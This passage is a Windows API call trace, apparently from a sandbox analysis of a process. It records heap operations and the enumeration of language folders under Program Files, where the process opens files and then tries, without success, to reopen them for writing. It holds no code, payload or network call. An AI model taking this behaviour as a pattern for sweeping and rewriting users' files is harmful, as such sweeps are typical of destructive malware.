RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.985] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0100.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.986] AreFileApisANSI () returned 1 [0100.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0100.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0100.986] AreFileApisANSI () returned 1 [0100.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85c60 [0100.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85c60, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 73 [0100.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.986] GetFileType (hFile=0x27c) returned 0x1 [0100.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85c60 | out: hHeap=0x20000) returned 1 [0100.986] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.987] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.987] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.987] CloseHandle (hObject=0x27c) returned 1 [0100.987] AreFileApisANSI () returned 1 [0100.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85580 [0100.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui") returned 73 [0100.987] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-CN\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-cn\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.987] GetLastError () returned 0x5 [0100.987] GetLastError () returned 0x5 [0100.987] SetLastError (dwErrCode=0x5) [0100.987] GetLastError () returned 0x5 [0100.987] SetLastError (dwErrCode=0x5) [0100.987] GetLastError () returned 0x5 [0100.987] SetLastError (dwErrCode=0x5) [0100.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0100.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.988] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d030, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧ᰀ")) returned 0 [0100.988] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0100.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.989] AreFileApisANSI () returned 1 [0100.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW", lpUsedDefaultChar=0x0) returned 57 [0100.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.989] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.989] AreFileApisANSI () returned 1 [0100.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.989] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 57 [0100.989] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.989] GetLastError () returned 0x5 [0100.989] GetLastError () returned 0x5 [0100.989] SetLastError (dwErrCode=0x5) [0100.989] GetLastError () returned 0x5 [0100.989] SetLastError (dwErrCode=0x5) [0100.989] GetLastError () returned 0x5 [0100.989] SetLastError (dwErrCode=0x5) [0100.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.990] AreFileApisANSI () returned 1 [0100.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0100.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW") returned 57 [0100.990] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.990] GetLastError () returned 0x5 [0100.990] GetLastError () returned 0x5 [0100.990] SetLastError (dwErrCode=0x5) [0100.990] GetLastError () returned 0x5 [0100.990] SetLastError (dwErrCode=0x5) [0100.990] GetLastError () returned 0x5 [0100.990] SetLastError (dwErrCode=0x5) [0100.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0100.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.990] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0100.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0100.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.990] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6e2e0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x70, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0100.990] FindClose (in: hFindFile=0x780d0 | out: hFindFile=0x780d0) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.991] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.991] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c97fd, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3ecc0a, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.991] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e0daa01, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e0daa01, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0100.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0100.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0100.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0100.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.992] AreFileApisANSI () returned 1 [0100.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0100.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.992] AreFileApisANSI () returned 1 [0100.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0100.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 73 [0100.992] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.993] GetFileType (hFile=0x368) returned 0x1 [0100.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0100.993] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.993] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.993] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.993] CloseHandle (hObject=0x368) returned 1 [0100.993] AreFileApisANSI () returned 1 [0100.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0100.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui") returned 73 [0100.994] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\zh-TW\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\zh-tw\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.994] GetLastError () returned 0x5 [0100.994] GetLastError () returned 0x5 [0100.994] SetLastError (dwErrCode=0x5) [0100.994] GetLastError () returned 0x5 [0100.994] SetLastError (dwErrCode=0x5) [0100.994] GetLastError () returned 0x5 [0100.994] SetLastError (dwErrCode=0x5) [0100.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: 